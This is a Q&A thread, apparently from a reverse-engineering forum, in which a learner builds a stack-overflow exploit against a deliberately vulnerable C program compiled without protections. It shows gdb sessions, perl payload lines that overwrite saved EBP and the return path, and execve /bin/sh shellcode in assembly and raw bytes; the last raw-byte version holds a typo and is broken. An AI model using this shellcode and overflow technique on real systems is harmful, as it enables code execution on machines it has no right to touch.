# Problems to put the shellcode into an easy program

Tags: debugging, gdb, reverse-engineering, exploit, stack-smash

I want to take the control of EBP and ESP to finally, when the program doing the ret,  EIP will addressed to a shellcode, but I have a problem. The program is that:

```
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int limit,c;
int getebp()
{
        __asm__("movl %ebp, %eax");
}

int proc(char *nombre)
{
    int *i;
    char buffer[256];
    i = (int *) getebp();
    limit = *i - (int)buffer + 4;
    for (c = 0; c < limit && nombre[c] != '\0'; c++)
        buffer[c] = nombre[c];
    printf("\nEncantado de conocerte: %s\n", buffer);
    return 0;
}


int main(int argc, char **argv[])
{
    if (argc < 2) {
        printf("\nUso: %s <nombre>\n", argv[0]);
        exit(0);
        }
        proc(argv[1]);
    return 0;
}
```

The code assembly of proc is like that:

```
(gdb) disass proc
Dump of assembler code for function proc:
   0x0804840b <+0>:     push   ebp
   0x0804840c <+1>:     mov    ebp,esp
   0x0804840e <+3>:     sub    esp,0x128
   0x08048414 <+9>:     call   0x8048404 <getebp>
   0x08048419 <+14>:    mov    DWORD PTR [ebp-0xc],eax
   0x0804841c <+17>:    mov    eax,DWORD PTR [ebp-0xc]
   0x0804841f <+20>:    mov    edx,DWORD PTR [eax]
   0x08048421 <+22>:    lea    eax,[ebp-0x10c]
   0x08048427 <+28>:    mov    ecx,edx
   0x08048429 <+30>:    sub    ecx,eax
   0x0804842b <+32>:    mov    eax,ecx
   0x0804842d <+34>:    add    eax,0x4
   0x08048430 <+37>:    mov    ds:0x8049828,eax
   0x08048435 <+42>:    mov    DWORD PTR ds:0x804982c,0x0
   0x0804843f <+52>:    jmp    0x8048466 <proc+91>
   0x08048441 <+54>:    mov    eax,ds:0x804982c
   0x08048446 <+59>:    mov    edx,DWORD PTR ds:0x804982c
   0x0804844c <+65>:    add    edx,DWORD PTR [ebp+0x8]
   0x0804844f <+68>:    movzx  edx,BYTE PTR [edx]
   0x08048452 <+71>:    mov    BYTE PTR [ebp+eax*1-0x10c],dl
   0x08048459 <+78>:    mov    eax,ds:0x804982c
   0x0804845e <+83>:    add    eax,0x1
   0x08048461 <+86>:    mov    ds:0x804982c,eax
   0x08048466 <+91>:    mov    edx,DWORD PTR ds:0x804982c
   0x0804846c <+97>:    mov    eax,ds:0x8049828
   0x08048471 <+102>:   cmp    edx,eax
   0x08048473 <+104>:   jge    0x8048484 <proc+121>
   0x08048475 <+106>:   mov    eax,ds:0x804982c
   0x0804847a <+111>:   add    eax,DWORD PTR [ebp+0x8]
   0x0804847d <+114>:   movzx  eax,BYTE PTR [eax]
   0x08048480 <+117>:   test   al,al
   0x08048482 <+119>:   jne    0x8048441 <proc+54>
   0x08048484 <+121>:   mov    eax,0x80485c0
   0x08048489 <+126>:   lea    edx,[ebp-0x10c]
   0x0804848f <+132>:   mov    DWORD PTR [esp+0x4],edx
   0x08048493 <+136>:   mov    DWORD PTR [esp],eax
   0x08048496 <+139>:   call   0x8048300 <printf@plt>
   0x0804849b <+144>:   mov    eax,0x0
   0x080484a0 <+149>:   leave
   0x080484a1 <+150>:   ret
End of assembler dump.
```

and the code assemly of main:

```
(gdb) disass main
Dump of assembler code for function main:
   0x080484a2 <+0>:     push   ebp
   0x080484a3 <+1>:     mov    ebp,esp
   0x080484a5 <+3>:     and    esp,0xfffffff0
   0x080484a8 <+6>:     sub    esp,0x10
   0x080484ab <+9>:     cmp    DWORD PTR [ebp+0x8],0x1
   0x080484af <+13>:    jg     0x80484d3 <main+49>
   0x080484b1 <+15>:    mov    eax,DWORD PTR [ebp+0xc]
   0x080484b4 <+18>:    mov    edx,DWORD PTR [eax]
   0x080484b6 <+20>:    mov    eax,0x80485dd
   0x080484bb <+25>:    mov    DWORD PTR [esp+0x4],edx
   0x080484bf <+29>:    mov    DWORD PTR [esp],eax
   0x080484c2 <+32>:    call   0x8048300 <printf@plt>
   0x080484c7 <+37>:    mov    DWORD PTR [esp],0x0
   0x080484ce <+44>:    call   0x8048320 <exit@plt>
   0x080484d3 <+49>:    mov    eax,DWORD PTR [ebp+0xc]
   0x080484d6 <+52>:    add    eax,0x4
   0x080484d9 <+55>:    mov    eax,DWORD PTR [eax]
   0x080484db <+57>:    mov    DWORD PTR [esp],eax
   0x080484de <+60>:    call   0x804840b <proc>
   0x080484e3 <+65>:    mov    eax,0x0
   0x080484e8 <+70>:    leave
   0x080484e9 <+71>:    ret
End of assembler dump.
```

Ok, I know that overwrite EBP with 272 Aes, so:

```
vagrant@precise32:~/expliting$ gdb -q ./saludo
Reading symbols from ./saludo...(no debugging symbols found)...done.
(gdb) b *proc+149
Breakpoint 1 at 0x80484a0
(gdb) r `perl -e 'print "A" x272 '`
Starting program: /home/vagrant/expliting/saludo `perl -e 'print "A" x272 '`

Encantado de conocerte: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒

Breakpoint 1, 0x080484a0 in proc ()
(gdb) x/16x $esp
0xbffff4c0:     0x080485c0      **0xbffff4dc**      0xb7fdc470      0x00000003
0xbffff4d0:     0xbffff500      0x07b1ea71      0xf63d4e2e      0x41414141
0xbffff4e0:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff4f0:     0x41414141      0x41414141      0x41414141      0x41414141
(gdb) q
```

And I know that the buffer's init direction is **0xbffff4dc**, so:

```
vagrant@precise32:~/expliting$ gdb -q ./saludo
Reading symbols from ./saludo...(no debugging symbols found)...done.
(gdb) b *main+70
Breakpoint 1 at 0x80484e8
(gdb) r `perl -e 'print "A"x268 . "\xd8\xf4\xff\xbf"'`
Starting program: /home/vagrant/expliting/saludo `perl -e 'print "A"x268 . "\xd8\xf4\xff\xbf"'`

Encantado de conocerte: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒▒▒▒▒

Breakpoint 1, 0x080484e8 in main ()
(gdb) i r ebp
ebp            0xbffff4d8       0xbffff4d8
(gdb) b *main+71
Breakpoint 2 at 0x80484e9
(gdb) c
Continuing.

Breakpoint 2, 0x080484e9 in main ()
(gdb) i r esp
esp            0xbffff4dc       0xbffff4dc
(gdb) x/x $esp
0xbffff4dc:     0x41414141
```

Ok, that sounds good, i have got to take the control of ESP. Now I want to shift the shellcode 4 bytes further. So:

```
vagrant@precise32:~/expliting$ gdb -q ./saludo
Reading symbols from ./saludo...(no debugging symbols found)...done.
(gdb) b *proc+150
Breakpoint 1 at 0x80484a1
(gdb) b *main+71
Breakpoint 2 at 0x80484e9
(gdb) r `perl -e 'print "\xe0\xf4\xff\xbf"'``cat /tmp/sc``perl -e 'print "A"x220 . "\xd8\xf4\xff\xbf"'`
Starting program: /home/vagrant/expliting/saludo `perl -e 'print "\xe0\xf4\xff\xbf"'``cat /tmp/sc``perl -e 'print "A"x220 . "\xd8\xf4\xff\xbf"'`

Encantado de conocerte: ▒▒▒▒▒^▒1▒F▒F
▒
 ▒▒▒V
▒1ۉ▒@̀▒▒▒▒▒/bin/shAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒▒▒▒▒

Breakpoint 1, 0x080484a1 in proc ()
(gdb) i r ebp
ebp            0xbffff4d8       0xbffff4d8
(gdb) c
Continuing.

Breakpoint 2, 0x080484e9 in main ()
(gdb) i r esp
esp            0xbffff4dc       0xbffff4dc
(gdb) x/x $esp
0xbffff4dc:     0xbffff4e0    
(gdb) x/16x $esp
0xbffff4dc:     0xbffff4e0      0x895e1feb      0xc0310876      0x89074688
0xbffff4ec:     0x0bb00c46      0x4e8df389      0x0c568d08      0x89db3180
0xbffff4fc:     0x80cd40d8      0xffffdce8      0x69622fff      0x68732f6e
0xbffff50c:     0x41414141      0x41414141      0x41414141      0x41414141
(gdb) q
```

!!WTF!! Why? now has ESP address to 0xbffff4e0  ??? The program is compiled like that:

```
gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack $1 -o $2
```

I have re-done my shellcode, (/tmp/binsh):

cat binsh.asm

```
section .text
global _start
_start:
xor eax, eax
push eax
push dword 0x68732f2f
push dword 0x6e69622f
mov ebx, esp
push eax
push ebx
mov ecx, esp
mov al, 0x0b
int 0x80
```

The objdump:

```
objdump -d binsh

binsh:     file format elf32-i386


Disassembly of section .text:

08048060 <_start>:
 8048060:       31 c0                   xor    %eax,%eax
 8048062:       50                      push   %eax
 8048063:       68 2f 2f 73 68          push   $0x68732f2f
 8048068:       68 2f 62 69 6e          push   $0x6e69622f
 804806d:       89 e3                   mov    %esp,%ebx
 804806f:       50                      push   %eax
 8048070:       53                      push   %ebx
 8048071:       89 e1                   mov    %esp,%ecx
 8048073:       b0 0b                   mov    $0xb,%al
 8048075:       cd 80                   int    $0x80
```

Basically I did,

```
echo /bin > bin
```

```
echo //sh > sh
```

````
and then, I got their hexdump values: 6e69622f and 68732f2f
Works fine:
```vagrant@precise32:/tmp$ ./binsh
$
````

Comment: Why do you ask _Why?_ ESP just as before at `Breakpoint 2` is `0xbffff4dc`, and the value on top of stack is `0xbffff4e0`, as to be expected exactly what you have placed at the start of the buffer by `perl -e 'print "\xe0\xf4\xff\xbf"'`.

Comment: ummm... Okay, alright, I have understood. Thanks so much. When I continue, the program should received a shellcode, however recived a SIGILL, illegal instruction: "Program received signal SIGILL, Illegal instruction." Could be a blocked by the stack? I compiled without protections and I used a gcc v2 and Ubuntu 12.04.04 without ASLR

Comment: SIGILL doesn't sound like execution blocked, rather like :-) illegal instruction. At which instruction pointer is the signal reported?

Answer (score 0):

> When I continue, the program should received a shellcode, however recived a SIGILL…

It seems the code loaded from `/tmp/sc` is wrong. You should see what's wrong with it by disassembling from 0xbffff4e0, e. g. `x/20i 0xbffff4e0`.

Answer (score 0):

You're right. `/tmp/sc` not executed the code. I've re-done my shellcode and I know that it's ok, If i type: `/tmp/binsc` I get the shellcode. But now, the program does nothing finally I have to Ctrl+C.

```
(gdb) b *proc+150
Breakpoint 1 at 0x80484a1

(gdb) b *main+71
Breakpoint 2 at 0x80484e9

(gdb) r `perl -e 'print "\xe0\xf4\xff\xbf"'``cat /tmp/binsh``perl -e 'print "A"x204 . "\xd8\xf4\xff\xbf"'`



^C
During startup program terminated with signal SIGINT, Interrupt.
(gdb)
```

Comment: It might be helpful if you'd add the content of `/tmp/binsh` to the question post.

Comment: okay, I have updated the question post with content of the shellcode

Comment: The file `binsh` doesn't contain just the shell code from `section .text`, but before that the ELF header etc.; you don't want to pass other information than the code to _the program_, do you? If not, you can't use `cat /tmp/binsh`.

Answer (score 0):

Newly, I have build my shellcode with that command:

```
echo `perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x76\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80/bin/sh";'` > binsh5
```

so, I think to know what's happening. When I execute the full instruction:

```
r `perl -e 'print "\xe0\xf4\xff\xbf"'``cat /tmp/binsh5``perl -e 'print "A"x234 . "\xd8\xf4\xff\xbf"'`
```

I take control the both ESP and EBP:

```
(gdb) i r ebp
ebp            0xbffff4d8       0xbffff4d8
(gdb) c
Continuing.

Breakpoint 2, 0x080484e9 in main ()
(gdb) i r esp
esp            0xbffff4dc       0xbffff4dc
(gdb) x/x $esp
0xbffff4dc:     0xbffff4e0
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xbffff4f8 in ?? ()
```

However I get a SIGSEGV. If I see this address:

```
(gdb) x/20i 0xbffff4f8
=> 0xbffff4f8:  bound  ebp,QWORD PTR [ecx+0x6e]
   0xbffff4fb:  das
   0xbffff4fc:  jae    0xbffff566
   0xbffff4fe:  inc    ecx
   0xbffff4ff:  inc    ecx
   0xbffff500:  inc    ecx
   0xbffff501:  inc    ecx
   0xbffff502:  inc    ecx
   0xbffff503:  inc    ecx
   0xbffff504:  inc    ecx
   0xbffff505:  inc    ecx
   0xbffff506:  inc    ecx
   0xbffff507:  inc    ecx
   0xbffff508:  inc    ecx
   0xbffff509:  inc    ecx
   0xbffff50a:  inc    ecx
   0xbffff50b:  inc    ecx
   0xbffff50c:  inc    ecx
   0xbffff50d:  inc    ecx
   0xbffff50e:  inc    ecx
```

I think to know the problem:

```
08048060 <_start>:
 8048060:       31 c0                   xor    %eax,%eax
 8048062:       50                      push   %eax
 8048063:       68 2f 2f 73 68          push   $0x68732f2f
 8048068:       68 2f 62 69 6e          **push   $0x6e69622f**
 804806d:       89 e3                   mov    %esp,%ebx
 804806f:       50                      push   %eax
 8048070:       53                      push   %ebx
 8048071:       89 e1                   mov    %esp,%ecx
 8048073:       b0 0b                   mov    $0xb,%al
 8048075:       cd 80                   int    $0x80
```

I think that the instruction in bold, is not pushed fully. It seems that shellcode pushs onto the stack like:

```
2F        das
62 69 6E  bound  ebp,QWORD PTR [ecx+0x6e]
```

I think I have found the problem, but nowadays I don't know how to solve.